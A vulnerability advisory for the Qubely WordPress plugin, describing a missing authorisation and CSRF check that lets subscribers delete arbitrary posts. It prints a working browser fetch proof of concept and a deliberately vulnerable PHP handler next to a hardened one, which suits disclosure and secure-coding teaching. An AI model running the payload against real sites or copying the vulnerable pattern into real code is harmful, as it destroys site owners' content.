wpvulndb | Krzysztof Zając | WPVDB-ID: E88B7A70-EE71-439F-B3C6-0300ADB980B0
Dec 27, 2021 - 12:00 a.m.

Qubely < 1.7.8 - Subscriber+ Arbitrary Post Deletion

2021-12-27 00:00:00
Krzysztof Zając
wpscan.com

EPSS: 0.001 (Low)
EPSS Percentile: 21.3%

The plugin does not perform an authorisation check or a CSRF check on the qubely_delete_saved_block AJAX action, and does not verify that the block to be deleted belongs to the plugin. As a result, any authenticated user, such as a subscriber, can delete arbitrary posts. Note: v1.7.7 added a capability check; the CSRF check was added in 1.7.8.

PoC

// Run from the browser of a logged-in user (a subscriber is enough); the request carries no nonce,
// which is why the missing CSRF check matters. block_id is the ID of any post on the site.
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": "action=qubely_delete_saved_block&block_id=1",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
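For comparison, the three checks the advisory says were missing (capability, nonce/CSRF, and a scope check that the target really is one of the plugin's blocks), shown as an added illustration of a WordPress AJAX handler. This is not Qubely's code: the handler, hook and post type names are prefixed "example_" and the post type constant is a placeholder, since the plugin's real values are not on the page; the `edit_posts` capability is an assumption of what a saved-block deletion should require.

```php
<?php
// Added illustration, not the plugin's own code. The post type name is a
// placeholder; the real plugin's post type is not given in the advisory.
define( 'EXAMPLE_SAVED_BLOCK_POST_TYPE', 'example_saved_block' );

// Vulnerable shape: trusts any logged-in user, any post ID, and any request
// origin. This is the pattern the advisory describes for versions < 1.7.7.
function example_delete_saved_block_vulnerable() {
    $block_id = isset( $_POST['block_id'] ) ? (int) $_POST['block_id'] : 0;
    wp_delete_post( $block_id, true ); // deletes whatever post ID the caller names
    wp_send_json_success();
}

// Hardened shape: capability check (the 1.7.7 fix), nonce check (the 1.7.8
// fix), and a scope check that the post belongs to the plugin.
function example_delete_saved_block_hardened() {
    // 1. Authorisation: subscribers do not hold edit_posts (assumed capability).
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 2. CSRF: the nonce must have been minted for this action and this user.
    //    check_ajax_referer() terminates the request when it is missing or invalid.
    check_ajax_referer( 'example_delete_saved_block', 'nonce' );

    // 3. Scope: only the plugin's own post type, and only if this user may delete it.
    $block_id = isset( $_POST['block_id'] ) ? absint( $_POST['block_id'] ) : 0;
    $post     = get_post( $block_id );
    if ( ! $post
        || EXAMPLE_SAVED_BLOCK_POST_TYPE !== $post->post_type
        || ! current_user_can( 'delete_post', $block_id ) ) {
        wp_send_json_error( 'not a deletable saved block', 400 );
    }
    wp_delete_post( $block_id, true );
    wp_send_json_success( array( 'deleted' => $block_id ) );
}

// Register only the hardened handler, and only for logged-in users: no
// wp_ajax_nopriv_ hook, so anonymous requests reach no handler at all.
add_action( 'wp_ajax_example_delete_saved_block', 'example_delete_saved_block_hardened' );

// The nonce is issued server-side to the page's script, e.g. via
// wp_localize_script( 'example-admin', 'exampleAjax', array(
//     'nonce' => wp_create_nonce( 'example_delete_saved_block' ),
// ) );
// and sent back as the "nonce" POST field alongside block_id.
```

A request like the PoC above, which carries no nonce, is rejected at step 2 even from a session that passes step 1.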

CPE Name  Operator  Version
qubely    lt        1.7.8
